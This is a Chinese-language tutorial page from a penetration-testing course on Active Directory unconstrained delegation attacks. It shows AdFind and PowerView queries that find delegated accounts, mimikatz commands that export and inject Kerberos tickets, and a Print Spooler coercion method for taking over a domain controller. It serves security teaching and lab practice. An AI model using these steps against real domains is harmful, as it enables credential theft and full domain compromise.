内网渗透
01基础知识
02域环境的搭建
03工作组权限
04域内权限
05Windows本地认证
06网络认证
07Kerberos协议
08工作组的信息搜集
09域内的信息搜集
10工作组的密码抓取
11域内的密码抓取
12Dcsync原理以及攻击
13RDP密码凭证抓取
14横向移动概述
15IPC$横向移动
16PTH哈希传递
17PTK密钥传递
18PTT票据传递
19PSexec进行横向移动
20SMBexec进行横向移动
21利用WinRM服务进行横向移动
22利用WMI进行横向移动
23用户枚举与喷洒
24用户枚举与喷洒-实验
25Roasting攻击
26Kerberoasting
27黄金票据
28黄金票据-实验
29白银票据
30白银票据-实验
31委派概述
32非约束性委派攻击
33约束性委派攻击
34约束性委派攻击-实验
35基于资源的约束性委派
36基于资源的约束性委派-实验
-
+
首页
32非约束性委派攻击
 ## 委派设置 非约束性委派设置在域控上面,设置对象分为两种 > 机器账户  点击应用-确定即可 > 注册了SPN的用户  配置了非约束性委派的机器,一旦访问该机器,TGT就会被缓存在LSASS进程的内存中,通过klist是不能查看的,必须查看内存。 需注意以下问题: - 域控是默认配置了非约束性委派的 - 配置的非约束性委派最好是机器用户 ## 查询已配置账户 > 配置与没有配置用户属性对比  > AdFind.exe进行查询 如果是在工作组中机器进行查询,需要提供域用户及密码 查询机器用户配置了非约束性委派 ``` AdFind.exe -b "DC=xbxaq,DC=com" -f "(&(samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=524288))" -dn ```  查询域用户(配置了SPN的用户)配置了非约束性委派 ``` AdFind.exe -b "DC=xbxaq,DC=com" -f "(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=524288))" -dn ```  > Powerview.ps1 ``` Import-Module .\Powerview.ps1 Get-NetComputer -unconstrained | select dnshostname, samaccountname ```  ## 钓鱼方式进行委派攻击 1、诱导管理员通过Kerberos访问被控机器(诱导管理员访问借助了Windows特性会用当前账户密码进行认证的特性)  2、在被控机器上使用mimikatz进行导出 ``` privilege::debug sekurlsa::tickets /export ```  3、将administrator票据注入到内存中,就可以访问域控了 ``` kerberos::ptt [0;524c5]-2-0-60a10000-Administrator@krbtgt-XBXAQ.COM.kirbi ```  ## 打印机漏洞进行委派攻击 一般情况下,域控是不会自动访问域内机器。可以利用Windows 打印系统远程协议(MS-RPRN),该方法域用户可以使用S-RPRN RpcRemoteFindFirstPrinterChangeNotification(Ex)的方法强制任何允许了Spooler服务的计算机,以通过Kerberos或NTLM对攻击者选择的目录进行身份认证。 非约束性委派主机接合Spooler打印机服务漏洞,可以让域控机器DC强制访问已控的具有本地管理员权限的非约束性委派机器,从而拿到域控用户的HASH值,从而控制整个域。 > 主动与被动的区别 - 主动:拿到域用户的hash值,进行PTT攻击 - 被动:拿到机器用户的hash值,使用dcsync,接着进行PTT攻击
毛林
2025年9月7日 11:39
转发文档
收藏文档
上一篇
下一篇
手机扫码
复制链接
手机扫一扫转发分享
复制链接
Markdown文件
PDF文档(打印)
分享
链接
类型
密码
更新密码